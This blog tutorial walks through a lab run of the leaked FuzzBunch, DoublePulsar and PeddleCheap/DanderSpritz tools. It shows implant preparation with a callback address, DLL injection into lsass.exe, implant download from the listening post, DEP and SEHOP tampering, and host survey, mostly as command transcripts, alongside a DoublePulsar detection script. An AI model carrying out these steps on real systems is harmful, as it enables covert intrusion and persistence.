/ ShadowBrokers

Match Made In The Shadows: Part [3]

Intro

At this point in the series I assume you have a full environment set up from the Part [2] post and an operational implant on the target. Today we will cover using FuzzBunch (FB) for exploitation and launching a PeddleCheap implant on the target host.

In this series we are going to cover the following:

  1. Environment setup and configuration
  2. Walk through an exploit scenario and tutorial
  3. Cover tradecraft and the advanced nature of the DanderSpritz agent
  4. Additional deep dive into components

This post will only cover portion three (3) as the material and setup are dense.

DanderSpritz

At this point in the series we have successfully set up an FB instance and are ready to start DanderSpritz (DS). Starting DS is straightforward and fairly simple to troubleshoot if problems arise. Be prepared to create missing directories and the like, as some components are absent from the leak.

DanderSpritz Setup

start.jar - starts the configuration setup
python start_lp.py - starts DS with auto setup

You should be greeted with the setup and environment initialisation output.

Once a session is created you can start interacting with specific modules within DS. Most of the work from here on is done within DS, as this is where the Listening Post (LP) is configured.

PeddleCheap Configuration

PeddleCheap (PC) appears at first glance to be a heavyweight post-exploitation agent with great capability, but within the toolkit it is the stager component: it can generate a multitude of stages, trigger and bind payloads whose job is to load the core implant. It is hard to tell from the leak alone whether a given implant is truly PeddleCheap, but ExpandingPulley (EP) and PeddleCheap share common code and code-name references within DS. I may cover EP in a separate post; it is an older agent but has some interesting modules worth covering.

PeddleCheap Payload Prep

Before we can use DoublePulsar to launch a DLL via kernel-to-user-mode APC injection, we need to prep the LP and the DLL. The command for this is pc_prep.

NOTE:

  • My target is x86
  • Windows 7
  • DoublePulsar is already implanted

15:20:41>> pc_prep -tcp -i386 -sharedlib
[15:20:42] ID: 1927 'python' started [target: z0.0.0.1]
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      3) - Standard TCP AppCompat-enabled (i386-winnt Level4 sharedlib)
-      4) - Standard TCP UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-      5) - Standard TCP WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
Pick the payload type

  • pc_prep - lets the operator prep a payload
  • -tcp - only offer payloads that use raw TCP as the C2 transport
  • -i386 - x86 payloads only
  • -sharedlib - only offer DLL (shared library) payloads, since we are going to configure a DLL

The following is a transcript of the configuration I used to get a Level3 implant up (NOTE: I also have a Level4 implant working and will follow up on it):

Pick the payload type
1
Update advanced settings
YES
Perform IMMEDIATE CALLBACK?
YES
Update the Windows firewall when listening?
YES
Enter the PC ID [0]
0
Change the number of LISTEN LOOPS?
NO
Change the LISTEN DURATION per loop?
NO
Do you want to LISTEN?
YES
Change the LISTEN HOURS?
NO
Change LISTEN BIND ADDRESS
NO
Enter the callback address (127.0.0.1 = no callback) [127.0.0.1]
192.168.251.137
Change CALLBACK PORTS?
NO
Change exe name in version information?
NO
- Pick a key
-   0) Exit
-   1) Create a new key
-   2) Default
Enter the desired option
2
- Configuration:
- 
- <?xml version='1.0' encoding='UTF-8' ?>
- <PCConfig>
-   <Flags>
-     <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
-     <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
-   </Flags>
-   <Id>0x0</Id>
-   <CallbackAddress>192.168.251.137</CallbackAddress>
- </PCConfig>
- 
Is this configuration valid
YES
Do you want to configure with FC?
NO
- Configured binary at:
-   D:\Logs\project_test\z0.0.0.1/Payloads/PeddleCheap_2017_11_11_15h23m59s.045/PC_Level3_dll.configured

PeddleCheap LP

Using DS we now start the LP prior to launching the payload, because the implant was configured for an immediate callback and needs something to call back to.

PeddleCheap Deployment

Using DoublePulsar we leverage the existing implant on the host to run our DLL. Follow the configuration prompts and edit as needed.

FB > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.155

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.155
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout:: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.251.155] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : D:\Logs\project_test\z0.0.0.1/Payloads/PeddleCheap_2017_11_11_15h23m59s.045/PC_Level3_dll.configured

[+] Set DllPayload => D:\Logs\project_test\z0.0.0.1/Payloads/PeddleCheap... (plus 50 characters)

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call

[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.155] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.155:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.251.155
TargetPort            445
DllPayload            D:\Logs\project_test\z0.0.0.1\Payloads\PeddleCheap
                      _2017_11_11_15h23m59s.045\PC_Level3_dll.configured
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] :

One interesting aspect of FB is the triple check of the supplied parameters, which suggests the operators followed a strict tool-usage SOP to verify every command and option. That makes sense when you are injecting into a critical process (NOTE: get this wrong and you will take the host down, or worse, bug check it). Once we are satisfied with the options we can execute and let the fun begin:


[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0xEDA05F81
    SMB Connection string is: Windows 7 Enterprise 7600
    Target OS is: 7 x86
    Target SP is: 0
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded
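The Ping function listed in the module menu above is the same presence check the public DoublePulsar scanners use: an implanted host answers an SMB1 Trans2 request with a Multiplex ID of 0x51, whereas a clean server simply echoes the MID the client sent (0x41 in those scanners). The block below is an added example, not code from the post or from FuzzBunch; it decodes the SMB1 header of a captured reply and applies that check. Both sample replies are constructed in the block, the preceding SMB negotiate/session-setup/tree-connect exchange is not performed, and only the SMB variant is covered, not the RDP variant offered as protocol option 1.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
PROBE_MID = 0x41          # MID the public probes send; a clean server echoes it back
DOUBLEPULSAR_MID = 0x51   # MID an implanted host answers with


def is_smb1(packet: bytes) -> bool:
    """True when the packet carries a NetBIOS session header followed by an SMB1 header."""
    return len(packet) >= 36 and packet[4:8] == SMB1_MAGIC


def parse_smb1_header(packet: bytes) -> dict:
    """Decode a 4-byte NetBIOS session header plus the 32-byte SMB1 header.

    SMB1 header layout (offsets relative to the SMB header): 0 magic, 4 command,
    5 NT status, 9 flags, 10 flags2, 12 PID high, 14 security features /
    signature (8 bytes), 22 reserved, 24 TID, 26 PID low, 28 UID, 30 MID.
    """
    if not is_smb1(packet):
        raise ValueError("not a NetBIOS-framed SMB1 packet")
    nb_type = packet[0]
    nb_len = int.from_bytes(packet[1:4], "big")
    hdr = packet[4:36]
    command, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", hdr, 4)
    signature = hdr[14:22]
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {
        "nb_type": nb_type, "nb_len": nb_len, "command": command,
        "status": status, "flags": flags, "flags2": flags2,
        "pid": (pid_high << 16) | pid_low, "signature": signature,
        "tid": tid, "uid": uid, "mid": mid,
    }


def doublepulsar_present(reply: bytes) -> bool:
    """Presence check applied to the reply of a Trans2 SESSION_SETUP probe."""
    h = parse_smb1_header(reply)
    return h["command"] == SMB_COM_TRANSACTION2 and h["mid"] == DOUBLEPULSAR_MID


def build_trans2_reply(mid: int, signature: bytes = bytes(8)) -> bytes:
    """Constructed sample reply: NetBIOS header + SMB1 header + empty body."""
    hdr = (SMB1_MAGIC
           + struct.pack("<BIBHH", SMB_COM_TRANSACTION2, 0, 0x98, 0xC807, 0)
           + signature + b"\x00\x00"                               # signature, reserved
           + struct.pack("<HHHH", 0x0800, 0xFEFF, 0x0800, mid))    # TID, PID low, UID, MID
    body = b"\x00" + b"\x00\x00"                                    # WordCount=0, ByteCount=0
    return b"\x00" + len(hdr + body).to_bytes(3, "big") + hdr + body


# Constructed replies: a clean server echoes the probe's MID; an implanted host does not.
CLEAN_REPLY = build_trans2_reply(PROBE_MID)
IMPLANTED_REPLY = build_trans2_reply(DOUBLEPULSAR_MID)

if __name__ == "__main__":
    for label, pkt in (("clean", CLEAN_REPLY), ("implanted", IMPLANTED_REPLY)):
        h = parse_smb1_header(pkt)
        print(f"{label}: cmd=0x{h['command']:02x} mid=0x{h['mid']:02x} "
              f"doublepulsar={doublepulsar_present(pkt)}")
```

Defensively this is the check to run across a 445/tcp sweep before and after patching; offensively it is what the Ping function gives you before committing to RunDLL against a process like lsass.exe.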

PeddleCheap Deploys Dsz Implant

In the Listener tab you will receive an option to accept the callback from PC. Things get interesting again here: on first look we notice yet another DLL being sent down to the PC stager. This is an extremely modular design; each component is only delivered once the previous stage has checked in, reducing exposure of the toolset at every opportunity.

Connection received from [192.168.251.155]:8080 to [192.168.251.137]:80...
Connection accepted
Starting session...
PC LP Version: 2.3.0
LP...ready to send the MAGIC NUMBER
Sending additional 380 bytes of random
LP ...ready to receive the symmetric key
LP...ready to decrypt the key

Remote Information
    PC Version : 2.3.0
         PC Id : 0x0000000000000000
       Arch-Os : i386-winnt (compiled i386-winnt)
   Session Key : 0d 34 b9 eb d9 08 bc b4 90 cf e1 bb 13 f5 24 68

Getting remote OS information

Remote OS
             Arch : i386
    Compiled Arch : i386
         Platform : winnt
Compiled Platform : winnt
          Version : 6.1 (Windows 7)
     Service Pack : 0
    C Lib Version : 6.0.0

Sending OS version check status to remote side (4 bytes)
Data (OS version check status) has been sent
Data (OS version check status) has been received and stored by remote side

Ready to send implant
Successfully loaded LP DLLs

Payload 
      File Name : D:\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll
   Send payload : true
  Original Size : 248832
      Send Size : 137488
       Checksum : c745
           Name : 
           Path : 
         Export : #1


Sending PayloadInfo run type information
Sending File/Library info to remote side (36 bytes)
Data (File/Library info) has been sent
Data (File/Library info) has been received and stored by remote side

Sending Export name to remote side (3 bytes)
Data (Export name) has been sent
Data (Export name) has been received and stored by remote side

Sending Payload to remote side (137488 bytes)
Data (Payload) has been sent
Data (Payload) has been received and stored by remote side

At this point the PC stager receives the core implant, Dsz_Implant_Pc.dll, loads it and acknowledges receipt. Note the Export field: like the DoublePulsar RunDLL step earlier, the LP enters the DLL by ordinal #1 rather than by name.

Current Process Manipulation

During the start routine the operator is asked whether to change the current process options. This deserves a deeper look, as it is something malware often does too: enabling specific privileges, elevating, or tidying up the Process Environment Block (PEB) when operating purely from memory. The options shown here are the process execute flags, the MEM_EXECUTE_OPTION_* bits read and written through NtQueryInformationProcess and NtSetInformationProcess with the ProcessExecuteFlags information class, so what is being adjusted is the process's DEP and SEHOP posture.

Able to load audit plugin, NT_ELEVATION loaded correctly, moving on
- Current process options (0x4d)
-     DisableExceptionChainValidation
-     DisableThunkEmulation
-     execution disabled
-     Permanent
Do you want to modify the process options?
YES

At the moment the following settings are enabled:

  • DisableExceptionChainValidation
    • Disables Structured Exception Handler Overwrite Protection (SEHOP) for this process
    • SEHOP is disabled by default on Windows 7 client editions
    • PC requires this to prevent the process being terminated when its code interacts with specific memory. This is an interesting find, as it may hint at the kinds of plugins being loaded
  • DisableThunkEmulation
    • Turns off DEP-ATL thunk emulation for a 32-bit process (the setting SetProcessDEPPolicy exposes as PROCESS_DEP_DISABLE_ATL_THUNK_EMULATION)
    • Through the documented API this setting cannot be changed again for the life of the process
  • ExecutionDisabled
    • This is MEM_EXECUTE_OPTION_DISABLE: execution from non-executable pages is disabled, i.e. DEP is on for this process. Compare the query after modification below, where it has become EXECUTION_ENABLED
  • Permanent
    • MEM_EXECUTE_OPTION_PERMANENT locks the execute options so they cannot be changed from user mode for the life of the process; Windows Vista and later set it automatically for images linked with /NXCOMPAT, such as lsass.exe
    • Because this flag is set, PC has to elevate to change the other process flags

Jumping ahead for a second, there is a built-in command that lets the operator check these settings once the agent is fully loaded: process options -query. The output shows the agent succeeded in changing the execute flags: 0x4d has become 0x72, meaning DEP is now off (EXECUTION_ENABLED replaces the earlier execution-disabled state), Permanent and DisableThunkEmulation are cleared, and both dispatch flags are set:

[17:16:20] ID: 2271 'process options' started [target: z0.0.0.17]
Execute options are 0x00000072

      EXECUTION_ENABLED

      EXECUTE_DISPATCH_ENABLED

      IMAGE_DISPATCH_ENABLED

      DISABLE_EXCEPTION_CHAIN_VALIDATION

Query/Set successful
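Decoding the two values the post shows (0x4d at start-up, 0x72 after the agent's change) against the MEM_EXECUTE_OPTION_* bit definitions confirms the flag names in both outputs and makes the change explicit. The block below is an added example, not code from the post or from the leaked tooling; the bit values are the documented ProcessExecuteFlags constants, the flag names follow the "process options -query" output above, and the helper names are my own.

```python
# MEM_EXECUTE_OPTION_* bits, as read and written through NtQueryInformationProcess /
# NtSetInformationProcess with the ProcessExecuteFlags (0x22) information class.
# Names follow DanderSpritz's "process options -query" output.
EXECUTE_OPTIONS = (
    (0x01, "EXECUTION_DISABLED"),                  # DEP on: no execution from non-executable pages
    (0x02, "EXECUTION_ENABLED"),                   # DEP off for this process
    (0x04, "DISABLE_THUNK_EMULATION"),             # no DEP-ATL thunk emulation
    (0x08, "PERMANENT"),                           # options locked for the life of the process
    (0x10, "EXECUTE_DISPATCH_ENABLED"),
    (0x20, "IMAGE_DISPATCH_ENABLED"),
    (0x40, "DISABLE_EXCEPTION_CHAIN_VALIDATION"),  # SEHOP off for this process
)
VALID_MASK = 0x7F

PAGE_BEFORE = 0x4D   # "Current process options (0x4d)" at PC start-up
PAGE_AFTER = 0x72    # "Execute options are 0x00000072" after the agent modified them


def decode_execute_options(value: int) -> list:
    """Names of the set bits, lowest bit first; rejects combinations the kernel refuses."""
    if value & ~VALID_MASK:
        raise ValueError(f"0x{value:x} has bits outside MEM_EXECUTE_OPTION_VALID_FLAGS")
    if value & 0x01 and value & 0x02:
        raise ValueError("EXECUTION_DISABLED and EXECUTION_ENABLED are mutually exclusive")
    return [name for bit, name in EXECUTE_OPTIONS if value & bit]


def dep_enabled(value: int) -> bool:
    """DEP is on when execution from non-executable pages is disabled."""
    return bool(value & 0x01)


def sehop_enabled(value: int) -> bool:
    return not value & 0x40


def user_mode_can_change(value: int) -> bool:
    """Without PERMANENT a process can still flip its own options via NtSetInformationProcess."""
    return not value & 0x08


def diff_execute_options(before: int, after: int) -> tuple:
    """(flags newly set, flags cleared) between two snapshots."""
    b, a = set(decode_execute_options(before)), set(decode_execute_options(after))
    return sorted(a - b), sorted(b - a)


def summarize(value: int) -> str:
    return (f"0x{value:02x}: DEP={'on' if dep_enabled(value) else 'off'} "
            f"SEHOP={'on' if sehop_enabled(value) else 'off'} "
            f"locked={'yes' if not user_mode_can_change(value) else 'no'}")


if __name__ == "__main__":
    for v in (PAGE_BEFORE, PAGE_AFTER):
        print(summarize(v), decode_execute_options(v))
    newly_set, cleared = diff_execute_options(PAGE_BEFORE, PAGE_AFTER)
    print("set:", newly_set)
    print("cleared:", cleared)
```

The interesting conclusion falls out of user_mode_can_change: with PERMANENT set on the starting value, the flags could not have been changed from user mode at all, which is consistent with the NT_ELEVATION plugin being loaded just before the prompt.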

I did some more research on this:

PeddleCheap Registration

Once the initial process checks pass, the agent performs a light survey of the operating system to build a target record that is stored on the LP side. This lets an operator match callbacks from multiple agents to known targets and restore that agent's settings and any monitors that were active.

Running command 'python Connected/Connected.py -project Ops.'
Unable to get target DB for unknown target
- --------------------------------------------------
- Re-registering global wrappers for current target
- --------------------------------------------------
- hide - Windows kernel 6.0+ PatchGuard protection
- packetredirect - Trigger failure alerter
- --------------------------------------------------
Showing you what we know so you can make a good decision in the menu below
crypto_guid: 20aa4209-ea71-422d-b4db-ea848e9a8c0d
hostname: OP-PC
macs: [u'00-50-56-ea-71-f2', u'00-0c-29-79-db-6e']
implant_id: 0x0000000000000000

Below match threshold or multiple matches. You must choose. Choose wisely.

  0) None of these - create a new target db

  1) (Confidence: 0.333333333333) project_test / OP-PC / PC ID 0x0000000000000000 / 7974af2e-6f94-4c19-9a3b-980b5dc54bd7 / MACS: ['00-50-56-f2-d3-78', '00-0c-29-2d-38-ef']

Looking further you will notice the crypto_guid; a GUID like this is a standard way of fingerprinting a host, and it allows an operator to build payloads that are cryptographically bound to a single host. Note also why the confidence is low: the two records share only the hostname and the PC ID of 0x0, which we left at its default during pc_prep and which therefore cannot distinguish one implant from another, while the MACs and the GUID differ.
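To make the matching step concrete, here is an added example of how an LP can score a callback against stored target records. It is not the post's code and not the Connected.py logic from the leak, which the page does not show; the scoring is my own construction: hostname, MAC overlap (Jaccard) and crypto_guid are weighted equally, and implant_id only counts when it is not the default 0 on both sides. Fed the two records from the output above it reproduces the 0.333 confidence shown; the third record (REIMAGED) and the 0.75 threshold are constructed.

```python
from dataclasses import dataclass

DEFAULT_IMPLANT_ID = 0   # pc_prep "Enter the PC ID [0]" left at the default


def norm_mac(mac: str) -> str:
    return mac.strip().lower().replace(":", "-")


@dataclass(frozen=True)
class TargetRecord:
    project: str
    hostname: str
    implant_id: int
    crypto_guid: str
    macs: frozenset

    @classmethod
    def make(cls, project, hostname, implant_id, crypto_guid, macs):
        return cls(project, hostname, implant_id, crypto_guid.lower(),
                   frozenset(norm_mac(m) for m in macs))


def match_confidence(observed: TargetRecord, stored: TargetRecord) -> float:
    """Mean agreement over the discriminating attributes (constructed scoring).

    hostname, MAC overlap and crypto_guid count equally. implant_id is only scored
    when at least one side carries a non-default ID: two default 0s match every
    other default 0 and prove nothing, exactly as the registration output shows.
    """
    all_macs = observed.macs | stored.macs
    scores = [
        1.0 if observed.hostname.lower() == stored.hostname.lower() else 0.0,
        (len(observed.macs & stored.macs) / len(all_macs)) if all_macs else 0.0,
        1.0 if observed.crypto_guid == stored.crypto_guid else 0.0,
    ]
    if not (observed.implant_id == DEFAULT_IMPLANT_ID and stored.implant_id == DEFAULT_IMPLANT_ID):
        scores.append(1.0 if observed.implant_id == stored.implant_id else 0.0)
    return sum(scores) / len(scores)


def rank_candidates(observed: TargetRecord, db, threshold: float = 0.75):
    """Return (auto-selected record or None, ranked list of (confidence, record)).

    Exactly one candidate at or above the threshold is accepted automatically;
    otherwise the operator must choose ("Below match threshold or multiple matches").
    """
    ranked = sorted(((match_confidence(observed, r), r) for r in db),
                    key=lambda c: c[0], reverse=True)
    strong = [r for conf, r in ranked if conf >= threshold]
    return (strong[0] if len(strong) == 1 else None), ranked


# Values taken from the registration output above.
OBSERVED = TargetRecord.make("project_test", "OP-PC", 0x0,
                             "20aa4209-ea71-422d-b4db-ea848e9a8c0d",
                             ["00-50-56-ea-71-f2", "00-0c-29-79-db-6e"])
STORED = TargetRecord.make("project_test", "OP-PC", 0x0,
                           "7974af2e-6f94-4c19-9a3b-980b5dc54bd7",
                           ["00-50-56-f2-d3-78", "00-0c-29-2d-38-ef"])
# Constructed: the same box after a NIC swap, keeping its crypto_guid and one MAC.
REIMAGED = TargetRecord.make("project_test", "OP-PC", 0x0,
                             "20aa4209-ea71-422d-b4db-ea848e9a8c0d",
                             ["00-0c-29-79-db-6e", "00-50-56-aa-bb-cc"])

if __name__ == "__main__":
    chosen, ranked = rank_candidates(OBSERVED, [STORED, REIMAGED])
    for conf, rec in ranked:
        print(f"{conf:.3f} {rec.project} / {rec.hostname} / {rec.crypto_guid}")
    print("auto-selected:", chosen.crypto_guid if chosen else "none, operator must choose")
```

The practical lesson is in the implant_id branch: give each build a distinct PC ID during pc_prep and the LP can resolve a callback on that alone; leave it at 0 and hostname collisions like the one above will keep prompting the operator.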

PeddleCheap System Survey

A major reason we started this series was to get to this exact point: the survey is a compelling part of what we do on offensive operations, and this implant does it in a way I want to emulate in a good portion of the implants we use.

Network Adapters / Data

Offensive operations require a deep understanding of the host you just landed on; to the trained eye this data is invaluable. When trying to traverse into specific subnets you will find that in some cases a dual-homed machine is the only route when no other attack vectors are present.

- [2017-11-09 19:28:22 z0.0.0.13] Showing ifconfig data so you can make sure you are on the correct target
FQDN: OP-PC
DNS Servers: 192.168.251.2
|               Description                |        MAC        |       IP        |    Netmask    |    Gateway    |   DHCP Server   |                                 Name                                  |
+------------------------------------------+-------------------+-----------------+---------------+---------------+-----------------+-----------------------------------------------------------------------+
| Bluetooth Device (Personal Area Network) | 00-50-56-EA-71-F2 | 169.254.96.23   |               |               |                 | Bluetooth Network Connection ({2C0A9CD7-B4BE-46F2-A86F-CC3639874531}) |
| Intel(R) PRO/1000 MT Network Connection  | 00-0C-29-79-DB-6E | 192.168.251.155 | 255.255.255.0 | 192.168.251.2 | 192.168.251.254 | Local Area Connection ({7B157EBD-BD87-47F3-A79A-6167FE6A3270})        |

System Version

One thing to note is the specific information being pulled back, in particular platform data and product type. This is often taken into account when deciding which host is the right one to implant and maintain access on. I have worked on this type of data collection in the past: Persistence

Running command 'survey -run D:\Resources\Ops\Data\survey.xml -sections env-setup -quiet'
Running command 'system version. '
Architecture: i386
   OS Family: winnt
     Version : 6.1 (Build 7600)
    Platform : Windows 7
Service Pack : 0.0
  Extra Info : 
Product Type : Workstation / Professional
    Terminal Services is installed, but only one interactive session is supported.

    Command completed successfully

System Processes

Process listing is a normal function of many agents, but DS takes it to the next level, letting operators easily separate standard system processes from potentially malicious ones through the Comment column and its "Check path in processdeep" hints. I also love the formatted output denoting parent/child relationships.

- [2017-11-09 19:28:28 z0.0.0.13] ================================== Process list ==================================================================
- [2017-11-09 19:28:30 z0.0.0.13] Data age: 01 seconds - data is fresh
- | PID  | PPID |                                 Full Path                                  |             User             |                          Comment                           |
- +------+------+----------------------------------------------------------------------------+------------------------------+------------------------------------------------------------+
- |    0 |    0 |                                                                            |                              |                                                            |
- |    4 |    0 | System                                                                     |                              | System Kernel                                              |
- |  272 |    4 | ---\SystemRoot\System32\smss.exe                                           | NT AUTHORITY\SYSTEM          | Session Manager Subsystem                                  |
- |  364 |  352 | C:\Windows\system32\csrss.exe                                              | NT AUTHORITY\SYSTEM          | Client-Server Runtime Server Subsystem                     |
- |  416 |  352 | C:\Windows\system32\wininit.exe                                            | NT AUTHORITY\SYSTEM          | Vista background service launcher                          |
- |  516 |  416 | ---C:\Windows\system32\services.exe                                        | NT AUTHORITY\SYSTEM          | Windows Service Controller                                 |
- |  640 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- | 2024 |  640 | ---------C:\Windows\system32\wbem\wmiprvse.exe                             | NT AUTHORITY\NETWORK SERVICE | Microsoft Windows Management Instrumentation               |
- |  696 |  516 | ------C:\Program Files\VMware\VMware Tools\vmacthlp.exe                    | NT AUTHORITY\SYSTEM          | VMWare                                                     |
- |  728 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- |  780 |  516 | ------C:\Windows\System32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- |  908 |  516 | ------C:\Windows\System32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- | 2724 |  908 | ---------C:\Windows\system32\Dwm.exe                                       | OP-PC\OP                     | Vista Desktop Window Manager                               |
- |  932 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- | 1088 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1244 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1356 |  516 | ------C:\Windows\System32\spoolsv.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Printer Spooler Service                          |
- | 1392 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1508 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1596 |  516 | ------C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe | NT AUTHORITY\SYSTEM          |                                                            |
- | 1620 |  516 | ------C:\Program Files\VMware\VMware Tools\vmtoolsd.exe                    | NT AUTHORITY\SYSTEM          | VMware Tools                                               |
- | 1872 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1936 |  516 | ------C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe               | NT AUTHORITY\SYSTEM          |                                                            |
- | 2972 | 1936 | ---------C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe            | OP-PC\OP                     |                                                            |
- | 1980 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1152 |  516 | ------C:\Windows\System32\msdtc.exe                                        | NT AUTHORITY\NETWORK SERVICE | Distributed Transaction Coordinator                        |
- | 2656 |  516 | ------C:\Windows\system32\taskhost.exe                                     | OP-PC\OP                     | Windows 7 Generic Host Process                             |
- | 3088 |  516 | ------C:\Windows\system32\SearchIndexer.exe                                | NT AUTHORITY\SYSTEM          | Microsoft search indexer                                   |
- | 3248 |  516 | ------C:\Program Files\Windows Media Player\wmpnetwk.exe                   | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service               |
- | 3648 |  516 | ------C:\Windows\system32\sppsvc.exe                                       | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service             |
- | 3684 |  516 | ------C:\Windows\System32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- |  524 |  416 | ---C:\Windows\system32\lsass.exe                                           | NT AUTHORITY\SYSTEM          | Local Security Authority Server Subsystem                  |
- |  532 |  416 | ---C:\Windows\system32\lsm.exe                                             | NT AUTHORITY\SYSTEM          | Vista Local Session Manager                                |
- |  424 |  408 | C:\Windows\system32\csrss.exe                                              | NT AUTHORITY\SYSTEM          | Client-Server Runtime Server Subsystem                     |
- | 2980 |  424 | ---C:\Windows\system32\conhost.exe                                         | OP-PC\OP                     | Microsoft Console Windows Host                             |
- |  472 |  408 | C:\Windows\system32\winlogon.exe                                           | NT AUTHORITY\SYSTEM          | Microsoft Windows Logon Process                            |
- | 2760 | 2712 | C:\Windows\Explorer.EXE                                                    | OP-PC\OP                     | Windows Explorer Shell                                     |
- | 2892 | 2760 | ---C:\Program Files\VMware\VMware Tools\vmtoolsd.exe                       | OP-PC\OP                     | VMware Tools                                               |
- | 3948 | 2760 | ---C:\Users\OP\Desktop\PC_Level4_exe.exe                                   | OP-PC\OP                     |                                                            |
- | 4064 | 2760 | ---C:\Users\OP\Desktop\PC_Level4_exe (2).exe                               | OP-PC\OP                     |                                                            |
background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor  \" " 
